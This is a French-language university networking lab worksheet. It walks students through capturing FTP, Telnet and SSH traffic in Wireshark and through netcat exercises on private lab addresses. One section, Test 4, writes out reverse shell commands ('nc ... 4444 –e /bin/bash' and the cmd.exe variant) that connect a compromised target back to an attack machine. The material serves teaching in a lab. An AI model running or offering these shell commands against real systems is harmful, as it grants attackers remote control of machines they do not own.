Vous êtes sur la page 1sur 5

• TP 01: Mise en place d’un réseau

• Nom de l’enseignant : Pr Anass Sebbar


• Niveau : 2ème année

TP n° 1
Analyse d’un réseau Informatique
Etude des protocoles FTP, Telnet et SSH
Utilisation de l’utilitaire Netcat

1- Objectifs :

L’objectif de ce TP est de mettre en place un réseau entre différentes machines et de faire une analyse
du réseau et des connexions client-serveur.

Nous allons nous intéresser à ce qui suit :

- Capture et Analyse du trafic du protocole FTP;


- Capture et Analyse du trafic du protocole Telnet;
- Capture et Analyse du trafic du protocole SSH;
- Utilisation de l’utilitaire netcat.

Consignes :

Le compte-rendu du TP doit être rendu une semaine après la séance du TP en format électronique
à:

sebbar.anass1@gmail.com

Le TP doit être travaillé en classe en groupes de 2 étudiants maximum. Les groupes du TP doivent
rester les mêmes pour les comptes-rendus et pour les prochains TP.

Déroulement du TP :
Durant ce TP nous allons travailler avec de 2 machines virtuelles : une machine avec le système
d’exploitation Linux et un machine avec le système d’exploitation Windows.
1. Capture et Analyse du trafic du protocole FTP

1.1.Capture :
1) Au niveau de la machine windows ou bien une troisième machine qui joue le rôle d’un
attacker qui sniffe le trafic Kali-Linux, lancer Wireshark, et lancer la capture des trames avec
wireshark sur le réseau correspondant.
2) Pour réaliser une connexion FTP il faux que les machines on le service ftp active.
- Revenez à la machine linux (192.168.1.1) et démarrez le service ftp, en tapant la commande
:
#service vsftpd start
3) Le protocole ftp est un protocole de quelle couche du modèle OSI ? Quel est le(s) numéro(s)
de port du protocole ftp ?
4) Au niveau d’une autre machine, ouvrez une connexion ftp vers la machine linux abritant le
serveur ftp en tapant la commande suivante :
#ftp 192.168.1.1
5) Saisissez un login et un mot de passe d’un utilisateur normal (login : user123, password :
user123) pour se connecter au serveur ftp, et listez le contenu du répertoire.
6) Arrêter la capture.

1.2.Analyse :
7) Le protocole FTP est basé sur quel protocole de la couche transport ?
8) Quels sont les messages échangés entre un client et un serveur ftp ? Remarquer les messages
pour l’établissement de la connexion TCP au début de la communication.
9) Relevez la valeur du port source et du port destination ? à quoi servent ces numéros ?
10) Si vous ouvrez une nouvelle connexion ftp, est ce que les numéros de ports changent ? faites
le test et constatez.
11) Analysez les autres messages échangés, en l’occurrence les messages TCP.

2. Capture et Analyse du trafic du protocole Telnet

2.1.Capture :
1) Au niveau de la machine windows, lancer Wireshark, et lancer la capture avec wireshark.
2) Revenez à la machine linux (192.168.1.1) et démarrez le service telnet, en tapant la
commande:
# service telnetd start
3) Le protocole telnet est un protocole de quelle couche du modèle OSI ? Quel est le(s)
numéro(s) de port du protocole telnet?
4) Au niveau d’une autre machine, ouvrez une connexion telnet vers la machine linux abritant
le serveur telnet en tapant la commande suivante :
# telnet 192.168.1.1
5) Saisissez un login et un mot de passe d’un utilisateur normal (login : user123, password :
user123) pour se connecter au serveur telnet.
6) Arrêter la capture.

2
2.2. Analyse :
7) Le protocole telnet est basé sur quel protocole de la couche transport ?
8) Quels sont les messages échangés entre un client et un serveur telnet ? Remarquer les
messages pour l’établissement de la connexion TCP au début de la communication.
9) Relevez la valeur du port source et du port destination ? à quoi servent ces numéros ?
10) Si vous ouvrez une nouvelle connexion telnet, est ce que les numéros de ports changent ?
faites le test et constatez.
11) Analysez les autres messages échangés, en l’occurrence les messages TCP.

3. Capture et Analyse du trafic du protocole SSH

3.1.Capture :
1) Au niveau de la machine windows, lancer Wireshark, et lancer la capture des trames avec
wireshark.
2) Revenez à la machine linux (192.168.1.1) et démarrez le service ssh, en tapant la commande:
# service sshd start
3) Le protocole ssh est un protocole de quelle couche du modèle OSI ? Quel est le(s) numéro(s)
de port du protocole ssh?
4) Au niveau d’une autre machine, ouvrez une connexion ssh vers la machine linux abritant le
serveur ssh en utilisant l’outil putty.
5) Saisissez un login et un mot de passe d’un utilisateur normal (login : user123, password :
user123) pour se connecter au serveur ssh.
6) Arrêter la capture.

3.2.Analyse :
7) Le protocole ssh est basé sur quel protocole de la couche transport ?
8) Quels sont les messages échangés entre un client et un serveur ssh ? Remarquer les messages
pour l’établissement de la connexion TCP au début de la communication.
9) Relevez la valeur du port source et du port destination ? à quoi servent ces numéros?
10) Si vous ouvrez une nouvelle connexion ssh, est ce que les numéros de ports changent ? faites
le test et constatez.
11) Analysez les autres messages échangés, en l’occurrence les messages TCP. Que ce que vous
remarquez.

4. Analyse d’une connexion client-serveur en utilisant l’utilitaire netcat

Afin de simuler plusieurs services ouverts sur de différents ports, nous avons installé sur la machine
cible l’outil Netcat.
Pour mettre Netcat en écoute sur un port de votre machine, il suffit d'utiliser les options -l et -p
(listen et port) comme ceci :
# nc -l -p Num_Port
-l : pour le mettre en mode listen / écoute
-p : pour qu'il écoute sur le port
Nous allons mettre le serveur en écoute sur différents ports (80, 25, 110, etc) même si ces services
ne sont pas réellement installés au niveau de la machine, et ceci en se connectant à ces services avec
la commande telnet par exemple :
# telnet 127.0.0.1 80

4.1. Test 1 :
Sur la machine kali-Linux réalisez la séquence de tests suivante :
a. Sur un terminal, mettez Netcat en écoute sous un port.

3
b. Tapez la commande # tcpdump –i lo sur un autre terminal afin de capturer le trafic capturé
par l’interface lo de la boucle locale.
c. Sur un 3ème terminal, lancez une commande client sur le serveur en écoute comme suit :
# nc 192.168.1.1 80
d. Essayez d’envoyer un message du client vers le serveur et vice versa. Qu’est-ce que vous
constatez ?
e. Analyser le trafic capturé par la commande tcpdump.
4.2. Test 2 :
Faites le test précédent en faisant communiquer un client et un serveur qui ne se trouvent pas sur la
même machine.
a. Sur un terminal, mettez Netcat en écoute sous un port.
b. Tapez la commande # tcpdump –i eth0 sur un autre terminal afin de capturer le trafic
capturé par l’interface eth0.
c. Sur un 3ème terminal, lancez une commande client sur le serveur en écoute comme suit :
# nc 80
d. Essayez d’envoyer un message du client vers le serveur et vice versa. Qu’est-ce que vous
constatez ?
e. Analyser le trafic capturé par la commande tcpdump.

4.3. Test 3 – Envoi de fichier :


Nous pouvons aussi envoyer un fichier d’un serveur au niveau de Ubuntu vers un client sur une
autre machine. Pour cela, faites le test suivant :
• Au niveau du serveur (Ubuntu): # nano file
#cat file | nc -vv –l -p port
• Au niveau du client (kali):
#nc @ip_serveur port > file_de_sortie
Vérifiez que le contenu du fichier reçu par le client est bien le même que celui au niveau du serveur.
4.3. Test 4 – bind shell & reverse shell :

Tout d'abord, nous configurons un écouteur Netcat sur la boîte d'attaque qui écoute sur le port 4444
avec la commande suivante :
• Au niveau du serveur : nc –lvp 4444

Ensuite, nous émettons la commande suivante sur l'hôte cible pour se connecter à notre boîte
d'attaque (rappelez-vous que nous avons une exécution de code à distance sur cette boîte):
• Pour client : nc 192.168.100.113 4444 –e /bin/bash
Ou pour executer un programme: nc.exe 192.168.100.113 4444 –e cmd.exe
4.4. Test 5 - Journalisation :
Le mode Journalisation permet ce mode permet d’obtenir un log (un journal), de sauvegarder un
fichier journal (fichier log) lors de l’exécution d’une action.
# nc -vv -o log.txt -l -p Num_Port
-o : pour loguer tous les octets reçus en hexadécimal.

4
Permet de journaliser la sortie dans le fichier log.txt dans lequel les données entrantes seront
précédées de "<" et les données sortantes de ">".

Après avoir arrêté l’écoute sur le port, vérifiez le contenu du fichier log pour s’assurer que c’était
bien les messages échangés entre le client et le serveur.

Vous aimerez peut-être aussi